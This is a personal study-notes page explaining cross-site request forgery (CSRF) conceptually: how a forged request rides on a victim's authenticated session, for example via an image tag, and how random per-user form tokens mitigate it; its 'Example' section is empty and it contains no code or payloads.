adam's notes

Cross-Site Request Forgery (CSRF/XSRF)

Cross-site request forgery (CSRF/XSRF) is a malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser.

  • aka confused deputy attack
    • user and the user’s browser are not necessarily the same thing
  • can exploit applications that use cookies to authenticate users and track sessions
  • manipulates a logged-on user’s browser to send a forged HTTP request, cookies, and other auth info to force the victim’s browser to perform a malicious request

How it Works

  • attacker must convince the victim to start a session with the target site
  • attacker then must pass an HTTP request to the victim’s browser that spoofs an action on the target site
    • e.g., changing a password or an email address
  • the request could be disguised in a number of ways without the victim necessarily having to click a link
    • e.g., as a image tag
  • so could be accomplished without the victim necessarily having to click a link
  • target site will accept the request as genuine if:
    • assumes that the browser is authenticated
      • i.e., there is a valid session cookie
    • and doesn’t complete any additional authorization on attacker’s input
      • or if the attacker is able to spoof the authorization

  • if attacker knows a website has already authenticated a user,
    • attacker can embed a link in a web page or HTML-based email to an image hosted from a site controlled by the attacker
    • When the browser retrieves the image in the link, additional commands are executed

Example

Mitigation

  • is extremely difficult
    • the requests tend to look similar to those made by a user of a web application performing normal actions within the application itself
  • request user-specific tokens in all form submissions
    • When a web app generates a link or form that enables a user to submit a request
    • the application should include a hidden input parameter with a common name such as XSRFToken
    • value of this token must be randomly generated in a way that an attacker cannot guess it
    • If the token can be guessed
      • then either the algorithm or the implementation is flawed
      • leaving the web app vulnerable to XSRF attacks

Graph View

Backlinks